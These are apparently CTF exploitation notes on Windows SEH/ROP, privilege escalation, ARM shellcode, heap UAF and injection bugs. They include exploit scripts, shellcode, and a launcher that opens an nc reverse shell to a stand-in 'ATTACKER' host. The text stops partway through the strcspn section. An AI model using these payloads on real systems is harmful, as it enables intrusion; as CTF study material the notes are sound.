# CTF Pwn - Advanced Exploit Techniques (Part 4)

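Windows exploitation (SEH overwrite, privilege escalation, CFG bypass), ARM shellcode, Forth interpreter exploitation, GF(2) Gaussian elimination for heap corruption, bit-flip and Game of Life shellcode primitives, and assorted UAF, out-of-bounds write, and null-byte injection bugs.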

## Table of Contents
- [Windows SEH Overwrite + pushad VirtualAlloc ROP (RainbowTwo HTB)](#windows-seh-overwrite--pushad-virtualalloc-rop-rainbowtwo-htb)
- [SeDebugPrivilege to SYSTEM (RainbowTwo HTB)](#sedebugprivilege-to-system-rainbowtwo-htb)
- [ARM Buffer Overflow with Thumb Shellcode (HackIM 2016)](#arm-buffer-overflow-with-thumb-shellcode-hackim-2016)
- [Forth Interpreter Command Execution (32C3 2015)](#forth-interpreter-command-execution-32c3-2015)
- [GF(2) Gaussian Elimination for Multi-Pass Tcache Poisoning (Midnight Flag 2026)](#gf2-gaussian-elimination-for-multi-pass-tcache-poisoning-midnight-flag-2026)
- [Single-Bit-Flip Exploitation Primitive (PlaidCTF 2016)](#single-bit-flip-exploitation-primitive-plaidctf-2016)
- [Game of Life Shellcode Evolution via Still-Lifes (DEF CON Quals 2016)](#game-of-life-shellcode-evolution-via-still-lifes-def-con-quals-2016)
- [UAF via Menu-Driven strdup/free Ordering (PlaidCTF 2016)](#uaf-via-menu-driven-strdupfree-ordering-plaidctf-2016)
- [mmap/munmap Size Mismatch UAF for Thread Stack Overlap (0CTF 2017)](#mmapmunmap-size-mismatch-uaf-for-thread-stack-overlap-0ctf-2017)
- [Premature Global Index Update for Out-of-Bounds Stack Write (BKP 2017)](#premature-global-index-update-for-out-of-bounds-stack-write-bkp-2017)
- [strcspn as Indirect Null Byte Injection (BSidesSF 2017)](#strcspn-as-indirect-null-byte-injection-bsidessf-2017)
- [Windows CFG Bypass Using system() as Valid Call Target (Insomni'hack 2017)](#windows-cfg-bypass-using-system-as-valid-call-target-insomnihack-2017)

---

## Windows SEH Overwrite + pushad VirtualAlloc ROP (RainbowTwo HTB)

**Pattern:** 32-bit Windows PE (Portable Executable) with ASLR (Address Space Layout Randomization), DEP (Data Execution Prevention), and GS (stack cookie) enabled but SafeSEH disabled. Combine a format string leak (defeats ASLR) with a buffer overflow that overwrites the SEH (Structured Exception Handling) record, then use a VirtualAlloc ROP chain to bypass DEP. Triggering the exception before the function returns means the GS cookie check never runs.

**Attack chain:**
1. **Format string leak defeats ASLR:** User input used as printf format string leaks code pointer at position 2: `LST %p-%p-%p-%p-%p` -> `binary_base = int(leaks[1], 16) - 0x14120`
2. **Buffer overflow triggers SEH:** `sprintf("Path: %s", user_path)` into 1024-byte buffer overflows into SEH handler chain
3. **Stack pivot via SEH handler:** `add esp, 0xe10; ret` redirects from exception context into ROP chain
4. **Ret-slide absorbs crash variation:** 30x `ret` gadgets at start of ROP chain absorb variable crash offset
5. **pushad VirtualAlloc technique:** Set all 8 registers to correct values, then `pushad` builds the entire `VirtualAlloc(lpAddress, dwSize=1, flAllocationType=0x1000, flProtect=0x40)` call frame in one instruction
6. **IAT-relative function resolution:** `VirtualAlloc` not in IAT (Import Address Table), but `TlsAlloc` is. Read `[TlsAlloc@IAT]`, add offset to get `VirtualAlloc` address -- offset calculated from provided `kernel32.dll`
7. **jmp esp to shellcode:** After VirtualAlloc marks stack RWX (Read-Write-Execute), `jmp esp` executes shellcode that follows

```python
# Key ROP chain structure (simplified)
rop  = p32(base + RET) * 30              # ret-slide for stability

# Set flProtect = 0x40 (PAGE_EXECUTE_READWRITE) via subtraction (avoid nulls)
rop += p32(base + POP_EAX) + p32(0x8314c2ab)
rop += p32(base + SUB_EAX)               # sub eax, 0x8314c26b -> eax = 0x40

# Resolve VirtualAlloc: [TlsAlloc@IAT] + offset
rop += p32(base + POP_EAX) + p32(base + TLSALLOC_IAT)
rop += p32(base + MOV_EAX_DEREF_EAX)     # eax = TlsAlloc address
rop += p32(base + ADD_EAX_EDI)           # eax = VirtualAlloc address

# pushad builds call frame, jmp esp runs shellcode
rop += p32(base + PUSHAD_RET)
rop += p32(base + JMP_ESP)
```
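
Step 1 of the chain (turning the `%p` leak into a module base) can be sketched as follows. This is a minimal sketch: the sample reply string is made up for illustration, and the function name `parse_base` is hypothetical; only the field index and the `0x14120` offset come from the notes above.

```python
def parse_base(leak_line: str, index: int = 1, offset: int = 0x14120) -> int:
    """Turn a '%p-%p-...' reply into the module base address."""
    fields = leak_line.strip().split("-")
    leaked = int(fields[index], 16)      # accepts "00B24120" as well as "0xb24120"
    base = leaked - offset
    # Windows image bases are 64 KiB aligned, so low bits set means a bad index/offset
    if base & 0xFFFF:
        raise ValueError(f"unaligned base {base:#x}: wrong index or offset?")
    return base

# Hypothetical server reply, for illustration only
sample = "0019FF10-00B24120-00000000-7FFD3000-00000001"
print(hex(parse_base(sample)))
```

The alignment check is a cheap sanity test that catches an off-by-one in the leak position before any gadget address is computed from a wrong base.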

**Bad characters for shellcode:** `\x00` (sprintf null), `\x09-\x0d` (whitespace), `\x20` (space), `\x25` (% triggers format string). Encode with msfvenom's shikata_ga_nai to avoid these bytes.
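
Before sending, it can help to scan every part of the payload (gadget addresses included) for the bad bytes listed above. A small sketch; the helper name `find_bad_bytes` is hypothetical:

```python
import struct

# Bad bytes from the list above: NUL, \x09-\x0d, space, '%'
BAD_BYTES = bytes([0x00, 0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x20, 0x25])

def find_bad_bytes(payload: bytes, bad: bytes = BAD_BYTES):
    """Return (offset, byte) pairs for every bad byte in the payload."""
    return [(i, b) for i, b in enumerate(payload) if b in bad]

# The subtraction trick from the ROP chain: both constants are clean,
# while the value they produce (0x40) could not be sent directly.
assert not find_bad_bytes(struct.pack("<I", 0x8314C2AB))
assert not find_bad_bytes(struct.pack("<I", 0x8314C26B))
print(find_bad_bytes(struct.pack("<I", 0x40)))   # three NUL bytes are reported
```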

**Detached process for shell stability:** When exploiting thread-based servers, child processes die with the parent thread. Compile a launcher with `CREATE_NEW_PROCESS_GROUP | DETACHED_PROCESS` flags:
```c
// i686-w64-mingw32-gcc launcher.c -o launcher.exe -static
#include <windows.h>
int main() {
    STARTUPINFOA si = {0}; PROCESS_INFORMATION pi = {0};
    si.cb = sizeof(si);
    CreateProcessA(NULL, "C:\\shared\\nc.exe ATTACKER 9002 -e cmd.exe",
        NULL, NULL, FALSE,
        CREATE_NEW_PROCESS_GROUP | DETACHED_PROCESS | CREATE_NO_WINDOW,
        NULL, NULL, &si, &pi);
    return 0;
}
```

**Key insight:** `pushad` pushes all 8 general-purpose registers in one instruction, in the order EAX, ECX, EDX, EBX, original ESP, EBP, ESI, EDI. Read from the new top of the stack upward, the values are therefore EDI, ESI, EBP, ESP, EBX, EDX, ECX, EAX. By pre-loading each register with the correct value, `pushad` lays out the return addresses and the stdcall arguments in exactly the order the call needs. This avoids the need for `mov [esp+N], reg` gadgets, which are rare.
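
The resulting stack layout can be checked with a small model of `pushad`. The register assignment below is the commonly used layout for this technique and is an assumption, not necessarily the exact one in this exploit; all addresses are placeholders.

```python
PUSH_ORDER = ("eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi")

def pushad(regs):
    """Model x86 PUSHAD: return (new_esp, dwords listed from the new stack top upward)."""
    pushed = [regs[name] for name in PUSH_ORDER]   # the ESP slot holds the pre-push value
    return regs["esp"] - 4 * len(pushed), pushed[::-1]

# Placeholder values, chosen only to make the layout readable
regs = {
    "edi": 0x10001001,  # address of a `ret` gadget (ROP NOP)
    "esi": 0x76541234,  # resolved VirtualAlloc address
    "ebp": 0x10002002,  # where VirtualAlloc returns to (e.g. `jmp esp`)
    "esp": 0x0019F000,  # lpAddress: filled in automatically by pushad
    "ebx": 0x00000001,  # dwSize
    "edx": 0x00001000,  # flAllocationType = MEM_COMMIT
    "ecx": 0x00000040,  # flProtect = PAGE_EXECUTE_READWRITE
    "eax": 0x90909090,  # padding that sits just after the arguments
}
new_esp, frame = pushad(regs)
for slot, value in enumerate(frame):
    print(f"[esp+{4 * slot:#04x}] {value:#010x}")
```

With this layout, the `ret` after `pushad` pops EDI (a plain `ret`), which pops ESI and enters `VirtualAlloc` with EBP as its return address and ESP, EBX, EDX, ECX as its four arguments.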

---

## SeDebugPrivilege to SYSTEM (RainbowTwo HTB)

Exploits `SeDebugPrivilege` to escalate to SYSTEM by migrating into a SYSTEM-owned process. The privilege allows opening and debugging any process. A privilege listed as "Disabled" is still held by the token and only needs to be enabled before use (e.g. via `AdjustTokenPrivileges`); Meterpreter does this automatically.

**Steps:**
1. Upload Meterpreter payload and obtain a session
2. Migrate into a SYSTEM-level process:
```text
meterpreter > migrate -N winlogon.exe
meterpreter > getuid
# NT AUTHORITY\SYSTEM
```

Meterpreter's `migrate` injects a DLL into the target process (`winlogon.exe`, `lsass.exe`), running code as that process's user (SYSTEM).

**Detection:** `whoami /priv` shows `SeDebugPrivilege`. Common on service accounts and `NT AUTHORITY\SERVICE`.

**Key insight:** Always run `whoami /priv` after landing a Windows shell. `SeDebugPrivilege` -- even when shown as "Disabled" -- is a direct path to SYSTEM via process migration.
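
When triaging many shells, the `whoami /priv` check can be scripted. A minimal sketch that parses the tabular output; the sample text is an illustrative excerpt, and the helper name `parse_privs` is hypothetical.

```python
def parse_privs(output: str) -> dict:
    """Map privilege name -> state ('Enabled' / 'Disabled') from `whoami /priv` output."""
    privs = {}
    for line in output.splitlines():
        parts = line.split()
        if parts and parts[0].startswith("Se") and parts[0].endswith("Privilege"):
            privs[parts[0]] = parts[-1]
    return privs

# Illustrative excerpt of `whoami /priv` output
sample = """
Privilege Name                Description                    State
============================= ============================== ========
SeDebugPrivilege              Debug programs                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
"""
privs = parse_privs(sample)
if "SeDebugPrivilege" in privs:
    print("SeDebugPrivilege held (state: %s) -> try process migration" % privs["SeDebugPrivilege"])
```

The check keys on presence, not state, because a held but disabled privilege can still be enabled.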

---

## ARM Buffer Overflow with Thumb Shellcode (HackIM 2016)

ARM exploitation differs from x86 in several key ways:

1. **Register conventions:** PC (program counter) instead of EIP; LR (link register) for return addresses
2. **Thumb mode:** Set bit 0 of target address to 1 to switch to Thumb (16-bit) instructions, which avoids null bytes more easily
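3. **Syscall convention:** The syscall number goes in `r7` and `svc` traps into the kernel. ARM EABI numbers (`execve` = 11, `dup2` = 63) match 32-bit x86 for these calls but differ from x86-64 (`execve` = 59, `dup2` = 33)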
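
The Thumb bit from point 2 only affects the address written over the saved return address. A short sketch of how that overwrite value might be packed; the buffer address is a placeholder.

```python
import struct

def thumb_target(addr: int) -> bytes:
    """Little-endian return address with bit 0 set, so the CPU enters Thumb state."""
    return struct.pack("<I", addr | 1)

def is_thumb(addr: int) -> bool:
    return bool(addr & 1)

shellcode_addr = 0x00010500            # placeholder: where the Thumb shellcode lives
print(thumb_target(shellcode_addr).hex())
```

The shellcode itself still starts at the even address; only the branch target carries the extra bit.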

Socket-based ARM Thumb shellcode (dup2 + execve):

```asm
.syntax unified
.thumb
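    movs r1, #2          @ newfd: start at stderr (2), count down to stdin (0)
dup2_loop:
    movs r0, r6          @ oldfd = socket fd (leaked or known, assumed in r6)
    movs r7, #0x3f       @ __NR_dup2 = 63
    svc  #1              @ dup2(sockfd, newfd); only r0 is clobbered
    subs r1, #1
    bpl  dup2_loop       @ loop while newfd >= 0

execve:
    adr  r0, shell       @ filename = "/bin/sh"
    eors r1, r1          @ argv = NULL
    eors r2, r2          @ envp = NULL
    movs r7, #0xb        @ __NR_execve = 11
    svc  #1

    .align 2             @ adr needs a word-aligned target in Thumb
shell: .asciz "/bin/sh"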
```

Cross-compile and test with QEMU:

```bash
arm-linux-gnueabi-as -mthumb -o sc.o shellcode.s
arm-linux-gnueabi-ld -o sc sc.o
qemu-arm -g 1234 ./sc  # Debug with gdb-multiarch
```

**Key insight:** Use `qemu-arm` for local testing and `gdb-multiarch` for debugging. Statically linked ARM binaries usually contain enough gadgets for ROP without any library dependencies.

---

## Forth Interpreter Command Execution (32C3 2015)

Forth interpreters may expose a `system` word that executes shell commands. When interacting with a Forth-based service:

```forth
s" cat /flag" system
s" ls -la" system
s" /bin/sh" system
```

The `s"` word pushes a string address and length onto the stack; `system` pops them and executes via the shell. Check for other dangerous words: `included` (file inclusion), `open-file`, `read-file`.
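
When scripting the interaction, the command line can be built with a small helper. This is a sketch under the assumption that the service reads one Forth line at a time; `forth_system` is a hypothetical name.

```python
def forth_system(cmd: str) -> str:
    """Build a Forth line that runs `cmd` through the `system` word."""
    # s" ends at the next double quote, so the command itself must not contain one
    if '"' in cmd or "\n" in cmd:
        raise ValueError('command must not contain a double quote or newline')
    return f's" {cmd}" system'

print(forth_system("cat /flag"))
```

The space after `s"` is required: `s"` is an ordinary word, and the string starts after the delimiter that follows it.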

---

## GF(2) Gaussian Elimination for Multi-Pass Tcache Poisoning (Midnight Flag 2026)

When a binary applies a deterministic XOR cipher to heap data (corrupting adjacent tcache `fd` pointers as a side effect), and each cipher seed produces a different XOR keystream at the fd offset, model the corruption as a linear algebra problem over GF(2) to find exactly which seeds transform the fd to a target address.

**Problem formulation:** Given current fd value `C` and target `T`, compute delta `D = C ^ T`. Each seed `i` produces a 64-bit XOR vector `v_i` at the fd offset. Find a subset `S` of seeds where `XOR(v_i for i in S) == D`.

```python
def find_subset_xor(vectors, target):
    """Find subset of 64-bit vectors that XOR to target via GF(2) Gaussian elimination"""
    n = len(vectors)
    basis = {}  # bit_position -> (vector_value, set_of_contributing_indices)

    for i, v in enumerate(vectors):
        mask = frozenset([i])
        val = v
        for bit in range(63, -1, -1):
            if not (val >> bit) & 1:
                continue
            if bit in basis:
                val ^= basis[bit][0]
                mask = mask.symmetric_difference(basis[bit][1])
            else:
                basis[bit] = (val, mask)
                break

    # Solve for target
    result = frozenset()
    val = target
    for bit in range(63, -1, -1):
        if (val >> bit) & 1:
            if bit not in basis:
                raise ValueError("Target not in span")
            val ^= basis[bit][0]
            result = result.symmetric_difference(basis[bit][1])
    return result

# Precompute XOR vectors: run cipher with each seed, extract 8 bytes at fd offset.
# Use a list indexed by seed so the indices returned by find_subset_xor are seeds
# (iterating a dict would enumerate its keys, not the vectors).
vectors = []
for seed in range(10000):
    keystream = djb2_cipher(seed, length=0x90)
    vectors.append(u64(keystream[0x88:0x90]))  # fd is at offset 0x88 in chunk

# Compute target delta (safe-linking aware)
current_fd = leaked_fd  # From heap over-read
target_fd = (io_list_all - 0x10) ^ (chunk_addr >> 12)  # Mangled target
delta = current_fd ^ target_fd

seeds_to_apply = find_subset_xor(vectors, delta)
# Apply each seed sequentially -- order doesn't matter (XOR is commutative)
for seed in seeds_to_apply:
    apply_cipher(chunk_idx, seed)
```

Typical result: ~30-35 seeds from a 10,000-seed space. Each application XORs one vector into the fd, cumulatively producing the exact target.

**Key insight:** Any deterministic byte-level transformation of heap metadata can be modeled as GF(2) linear algebra when the operation is XOR. This generalizes beyond specific cipher implementations -- it applies whenever you can repeatedly XOR predictable patterns into a target value.
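
The safe-linking-aware delta used above follows glibc's pointer mangling (glibc 2.32 and later), where the stored `fd` is the real pointer XORed with the slot address shifted right by 12. A minimal sketch with made-up addresses:

```python
def protect_ptr(pos: int, ptr: int) -> int:
    """Mangle `ptr` for storage at address `pos` (glibc safe-linking)."""
    return (pos >> 12) ^ ptr

def reveal_ptr(pos: int, stored: int) -> int:
    """Inverse of protect_ptr: recover the real pointer from the stored value."""
    return (pos >> 12) ^ stored

# Hypothetical addresses, for illustration only
fd_slot  = 0x55555555B2A0      # address of the fd field being corrupted
old_next = 0x55555555B330      # chunk the fd currently points to
target   = 0x7FFFF7E1A670      # 16-byte aligned address we want malloc to return

current_fd = protect_ptr(fd_slot, old_next)
target_fd  = protect_ptr(fd_slot, target)
delta = current_fd ^ target_fd
print(hex(delta))
```

Because the same mask appears in both mangled values, it cancels out: the delta equals `old_next ^ target`. The slot address is still needed whenever only the mangled `fd` has been leaked and the plain pointer has to be recovered first.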

---

## Single-Bit-Flip Exploitation Primitive (PlaidCTF 2016)

**Pattern (butterfly):** Binary accepts an integer, computes `address = input >> 3` and `bit = input & 7`, then flips `*address ^= (1 << bit)` after making the page RWX via `mprotect`. Single bit flip per invocation, but chaining multiple flips builds arbitrary code.
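
The input encoding can be wrapped in helpers so each flip is computed rather than typed by hand. A minimal sketch; the function names are hypothetical.

```python
def encode_flip(address: int, bit: int) -> int:
    """Integer to send so the binary flips `bit` of the byte at `address`."""
    if not 0 <= bit <= 7:
        raise ValueError("bit must be in 0..7")
    return (address << 3) | bit

def decode_flip(value: int):
    """Inverse of encode_flip, mirroring what the binary computes."""
    return value >> 3, value & 7

def single_bit_index(old: int, new: int) -> int:
    """Bit position that turns byte `old` into byte `new` (must differ in exactly one bit)."""
    diff = old ^ new
    if diff == 0 or diff & (diff - 1):
        raise ValueError("bytes do not differ in exactly one bit")
    return diff.bit_length() - 1

# add rsp, 0x48 -> add rsp, 0x08 at the address used in step 1 below
print(encode_flip(0x400863, single_bit_index(0x48, 0x08)))
```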

**Exploitation strategy:**

1. **Create a loop:** Flip a bit in the function epilogue `add rsp, 0x48` to `add rsp, 0x08`, causing stack misalignment that reuses buffer contents as return address. Set return address to function start for repeated invocations:
```python
# Flip bit 6 at address 0x400863 to change 0x48 -> 0x08
cosmic_ray = (0x400863 << 3) | 6  # = 33571614
```

2. **Craft `jmp rsp`:** Flip one bit of an existing `jmp rax` instruction (0xFF 0xE0) to `jmp rsp` (0xFF 0xE4):
```python
cosmic_ray = (0x4006E6 << 3) | 2  # = 33568562
```

3. **Disable stack canary check:** Flip the conditional jump (`jnz`) at the canary check to a non-branching instruction:
```python
# 0x75 (jnz) ^ 0x40 = 0x35 (xor eax, imm32)
cosmic_ray = (0x40085B << 3) | 6
```

4. **Expand input buffer:** Flip a bit in the `fgets` size argument to read more bytes for shellcode

5. **Make stack RWX:** Flip `mov r15, rbp` to `mov r15, rsp` so `mprotect` targets the stack

6. **Inject shellcode** on the now-RWX stack, return to `jmp rsp`

**Alternative approach:** XOR shellcode with existing `.text` bytes, compute which bits differ, flip each one, then redirect execution to the shellcode location.
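
The alternative approach amounts to a byte-wise diff. A sketch, assuming the existing bytes at the destination have been read from the binary; `plan_flips` is a hypothetical helper.

```python
def plan_flips(base_addr: int, existing: bytes, desired: bytes):
    """List the inputs (address << 3 | bit) that turn `existing` into `desired`."""
    if len(existing) != len(desired):
        raise ValueError("existing and desired must have the same length")
    inputs = []
    for offset, (old, new) in enumerate(zip(existing, desired)):
        diff = old ^ new                 # set bits are the ones that must be flipped
        for bit in range(8):
            if (diff >> bit) & 1:
                inputs.append(((base_addr + offset) << 3) | bit)
    return inputs

# jmp rax (FF E0) -> jmp rsp (FF E4): one flip, at the second byte
print(plan_flips(0x4006E5, b"\xff\xe0", b"\xff\xe4"))
```

On average half the bits differ, so an N-byte shellcode needs roughly 4N invocations; picking a destination whose bytes already resemble the shellcode reduces that count.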

**Key insight:** A single-bit-flip primitive becomes arbitrary code execution through cumulative modifications. Each flip changes one instruction or operand, and returning to the function start enables unlimited flips. Priority targets: (a) stack unwinding instructions (control flow hijack), (b) existing branch instructions (bypass security checks), (c) `mprotect` arguments (change memory permissions), (d) size parameters (expand read buffers).

---

## Game of Life Shellcode Evolution via Still-Lifes (DEF CON Quals 2016)

**Pattern (b3s23):** Binary reads coordinates for Conway's Game of Life cells on a 110x110 grid, runs 15 iterations, then executes the grid data as machine code. Construct a board that remains stable through 15 iterations while containing valid x86 shellcode.

**Approach — static shellcode rows:**

1. Place x86 instructions in specific rows of the grid
2. Use Game of Life "still-life" patterns (stable configurations) on surrounding rows to keep the shellcode rows unchanged through all iterations
3. Connect shellcode rows with `JMP` instructions to skip non-code rows

```text
Row N-1: still-life border pattern (keeps row N stable)
Row N:   >  shellcode bytes  | JMP to next row
Row N+1: still-life border pattern
Row N+2: (empty or border)
```

**Shellcode constraints:**
- Avoid 5+ consecutive 1-bits (no small still-life can stabilize these)
- Use `add al, 0` (0x04 0x00) as NOP separator between instructions (only one bit set)
- Adjacent "wall" patterns (vertical columns of 1s) must match at boundaries
- Two columns of 0s between patterns prevents interference

**Useful still-life patterns for embedding:**
```text
Block:    xx     Snake:  xx x
          xx             x xx
```

```python
# Convert board to coordinates and feed to binary
import re
from pwn import *

rows = open('board.txt').read().split('\n')
coords = []
for y, row in enumerate(rows):
    for m in re.finditer('x', row):
        coords.append((m.start(), y))

p = process('./b3s23')
for x, y in coords:
    p.sendline(f'{x},{y}')
p.sendline('done')
p.interactive()
```

**Key insight:** Game of Life still-lifes are patterns unchanged by the update rules. By embedding shellcode in rows surrounded by still-life borders, the code survives all iterations. The simplest strategy is to embed only a tiny first stage that calls `read()` to load real shellcode once execution starts, which avoids encoding a full payload under Game of Life constraints.
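
A board can be validated offline before it is sent. The sketch below simulates B3/S23 on an unbounded plane, which is an assumption: the real 110x110 grid has edges, so patterns touching the border may behave differently.

```python
from collections import Counter

def parse(board: str):
    """Set of (x, y) live cells from a text board that uses 'x' for live cells."""
    return {(x, y) for y, row in enumerate(board.splitlines())
            for x, ch in enumerate(row) if ch == "x"}

def step(live):
    """One Game of Life generation (birth on 3 neighbours, survival on 2 or 3)."""
    counts = Counter((x + dx, y + dy) for x, y in live
                     for dx in (-1, 0, 1) for dy in (-1, 0, 1) if (dx, dy) != (0, 0))
    return {cell for cell, n in counts.items() if n == 3 or (n == 2 and cell in live)}

def stays_fixed(live, generations: int = 15) -> bool:
    """True if the pattern is identical after every one of `generations` steps."""
    current = set(live)
    for _ in range(generations):
        current = step(current)
        if current != live:
            return False
    return True

block = parse("xx\nxx")
snake = parse("xx x\nx xx")
blinker = parse("xxx")
print(stays_fixed(block), stays_fixed(snake), stays_fixed(blinker))
```

Running `stays_fixed(parse(open('board.txt').read()))` on the full board catches an unstable row before the 15 iterations corrupt the shellcode remotely.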

---

## UAF via Menu-Driven strdup/free Ordering (PlaidCTF 2016)

**Pattern (unix_time_formatter):** Menu-driven binary uses `strdup()` to allocate user input (format string, timezone) and `free()` on exit. Exit option frees allocations but asks "Are you sure?" — answering "no" returns to the menu with dangling pointers. New allocations via `strdup()` reuse the freed memory.

**Exploitation:**

1. Set format string (validated for safe characters: `%aAbBcC...`)
2. Set timezone (no input validation)
3. Choose exit → both pointers freed, but answering "no" continues
4. Set timezone twice — second `strdup()` reuses the format string's freed allocation
5. Format string pointer now points to attacker-controlled timezone data
6. "Print time" executes `system("/bin/date -d @TIME +'FORMAT'")` with injected format:

```python
from pwn import *

p = remote('target', 9999)
p.sendlineafter('>', '1')      # Set format
p.sendlineafter('Format:', '%c')
p.sendlineafter('>', '3')      # Set timezone
p.sendlineafter('zone:', "';/bin/sh #\\")
p.sendlineafter('>', '5')      # Exit (frees both)
p.sendlineafter('(y/N)?', 'n') # Don't actually exit
p.sendlineafter('>', '3')      # First alloc reuses the most recently freed chunk
p.sendlineafter('zone:', "';/bin/sh #\\")
p.sendlineafter('>', '3')      # Second alloc lands in the freed format slot
p.sendlineafter('zone:', "';/bin/sh #\\")
p.sendlineafter('>', '4')      # Print → shell
p.interactive()
```

**Key insight:** `strdup()` uses `malloc()` internally, so freed `strdup` buffers enter the malloc freelist and are reused by subsequent `strdup()` calls of similar size. When the "exit" path frees memory but allows returning to the menu, any field with strict input validation (format) can be overwritten via a field without validation (timezone) through UAF freelist reuse. The `system()` call then executes the unvalidated content.
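
Why two timezone allocations are needed can be seen in a toy model of a last-in, first-out free list (as used by fastbins and tcache). This is a sketch, not glibc: it assumes both strings fall in the same size class and that the exit path frees the format before the timezone.

```python
class ToyBin:
    """Single size-class free list with LIFO reuse."""
    def __init__(self):
        self.free_list = []
        self.next_fresh = 0

    def malloc(self) -> str:
        if self.free_list:
            return self.free_list.pop()          # most recently freed chunk first
        self.next_fresh += 1
        return f"chunk{self.next_fresh}"

    def free(self, chunk: str) -> None:
        self.free_list.append(chunk)

heap = ToyBin()
fmt_ptr = heap.malloc()        # strdup(format)   -> chunk1
tz_ptr = heap.malloc()         # strdup(timezone) -> chunk2

heap.free(fmt_ptr)             # exit path frees both, pointers are kept (dangling)
heap.free(tz_ptr)

first = heap.malloc()          # 1st new timezone reuses chunk2
second = heap.malloc()         # 2nd new timezone reuses chunk1 == fmt_ptr
print(first, second, second == fmt_ptr)
```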

---

## mmap/munmap Size Mismatch UAF for Thread Stack Overlap (0CTF 2017)

**Pattern (UploadCenter):** A PNG upload service uses `mmap(width*height)` for image storage but `munmap(compressed_length)` to free it. When compressed length exceeds image dimensions, `munmap` frees more memory than was mapped, unmapping adjacent regions.

**Attack chain:**
1. Upload a large PNG so its mmap lands adjacent to a global output buffer
2. Delete the PNG: `munmap` frees both the image and the output buffer
3. Spawn a thread: `pthread_create` mmaps a stack into the freed gap, overlapping the still-referenced output buffer
4. Upload a new PNG: decompressed data written through the output buffer overwrites the thread's stack for ROP

```python
# Trigger: allocation uses image dimensions, deallocation uses compressed size
# img = mmap(0, width*height, ...)      # small allocation
# pngobj->length = compressed_length     # larger than width*height
# munmap(pngobj->content, pngobj->length) # OVER-UNMAP!

# Exploit chain:
upload_png(large_png)        # mmap lands near global output buffer
delete_png()                 # munmap frees output buffer region too
start_monitor()              # pthread_create mmaps stack into freed gap
upload_rop_png(rop_payload)  # decompress writes through output buf -> thread stack
```

**Key insight:** The mmap/munmap size mismatch creates an "over-unmap" that silently destroys adjacent mappings. When a new thread's stack fills the gap, the old buffer pointer becomes a write-what-where into the thread's stack frame. This is a race-free UAF variant that doesn't require heap metadata corruption.
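
How far the over-unmap reaches is simple page arithmetic, since `munmap` removes every page that overlaps the given range. A sketch with a made-up mapping address and 4 KiB pages assumed:

```python
PAGE = 0x1000  # assumed page size

def page_round_up(n: int) -> int:
    return (n + PAGE - 1) & ~(PAGE - 1)

def over_unmapped(addr: int, mapped_len: int, unmap_len: int):
    """Range [start, end) destroyed beyond the original mapping, or None if there is none."""
    mapped_end = addr + page_round_up(mapped_len)
    unmap_end = addr + page_round_up(unmap_len)
    return (mapped_end, unmap_end) if unmap_end > mapped_end else None

# Hypothetical numbers: a one-page image whose compressed length is 0x2800 bytes
region = over_unmapped(0x7F0000000000, 0x1000, 0x2800)
print([hex(x) for x in region])
```

Whatever mapping sits in the returned range (here two pages) is gone after the delete, which is why the compressed length has to be tuned so the range covers the output buffer.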

---

## Premature Global Index Update for Out-of-Bounds Stack Write (BKP 2017)

**Pattern (memo):** The `new_memo` function stores the user-supplied memo index into a global variable *before* validating bounds. The allocation is rejected for out-of-bounds values, but the global `last_memo` retains the invalid index. The `edit_memo` function uses `last_memo` without bounds checking, and the program stores stack pointers at indices 5-9 of the array during `new_memo`. Setting `last_memo=6` causes `edit_memo` to write through a stack address, enabling direct stack overwrites.

```python
# Bug: global index set BEFORE bounds check
# new_memo:
#   last_memo = user_index     # stored here
#   if user_index > 4: reject  # checked too late
#   memos[user_index + 5] = &stack_local  # stack addr in array!

# Exploit:
new_memo(1)      # valid: memos[1] allocated, memos[6] = stack pointer
new_memo(6)      # rejected, but last_memo = 6
edit_memo(payload)  # writes through memos[6], which is a stack address
# payload overwrites return address -> hidden shellcode executor function
```

**Key insight:** TOCTOU-style vulnerability in a single function — the index is committed to global state before validation rejects it. Combined with the program storing stack addresses in the same array, this turns an invalid index into a direct stack write primitive. Look for patterns where global state is updated before error checking.
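
The commit-before-validate bug can be reproduced in a few lines. This is a toy model of the logic described above, not the challenge's code: the class, the slot count, and the string standing in for a stack pointer are all illustrative.

```python
class MemoApp:
    SLOTS = 5                            # valid memo indices are 0..4

    def __init__(self):
        self.memos = [None] * 10         # 0..4: memo buffers, 5..9: stack pointers
        self.last_memo = None

    def new_memo(self, index: int, stack_ref: str = "stack_ptr") -> bool:
        self.last_memo = index           # BUG: committed before validation
        if not 0 <= index < self.SLOTS:
            return False                 # rejected, but last_memo keeps the bad index
        self.memos[index] = bytearray(16)
        self.memos[index + 5] = stack_ref
        return True

    def edit_target(self):
        """What edit_memo would write through: no bounds check on last_memo."""
        return self.memos[self.last_memo]

app = MemoApp()
app.new_memo(1)                          # valid call plants a stack reference at index 6
app.new_memo(6)                          # rejected, yet last_memo is now 6
print(app.last_memo, app.edit_target())
```

The fix is to validate first and assign `last_memo` only on the success path.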

---

## strcspn as Indirect Null Byte Injection (BSidesSF 2017)

**Pattern (Steel Mountain: Sensors):** A CGI binary constructs filenames via `snprintf("sensors/%s.cfg", input)`. Direct null byte injection is blocked by the CGI library. After snprintf, `strcspn(buf, "\r\n")` is called and the result index is used to write a null byte (terminating at the first newline). Injecting `%0A` (URL-encoded newline) after the desired filename causes: `sensors/../flag.txt\n.cfg` → null byte written at the `\n` position → `sensors/../flag.txt\0.cfg`, truncating the `.cfg` extension.

```bash
# Request: sensor=../flag.txt%0A&debug
# snprintf produces: "sensors/../flag.txt\n.cfg"
# strcspn("sensors/../flag.txt\n.cfg", "\r\n") = 19
# buf[19] = '\0'
# Result: "sensors/../flag.txt" (null-terminated, .cfg removed)
# -> reads flag.txt from the parent of sensors/ via path traversal
```

**Key insight:** `strcspn` followed by null-byte write is a common C pattern for line termination. When user input reaches this code path with injected newlines, it becomes an indirect null byte injection vector — even when direct null bytes are filtered by the input layer (CGI, HTTP).
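
The truncation can be reproduced with a Python re-implementation of `strcspn`. A sketch of the described logic; `build_path` is a hypothetical stand-in for the CGI's filename handling.

```python
def strcspn(s: bytes, reject: bytes) -> int:
    """Length of the initial segment of `s` containing no byte from `reject`."""
    for i, b in enumerate(s):
        if b in reject:
            return i
    return len(s)

def build_path(user_input: bytes) -> bytes:
    buf = b"sensors/" + user_input + b".cfg"     # snprintf("sensors/%s.cfg", input)
    return buf[:strcspn(buf, b"\r\n")]           # buf[strcspn(buf, "\r\n")] = '\0'

print(build_path(b"temp"))             # normal request keeps the extension
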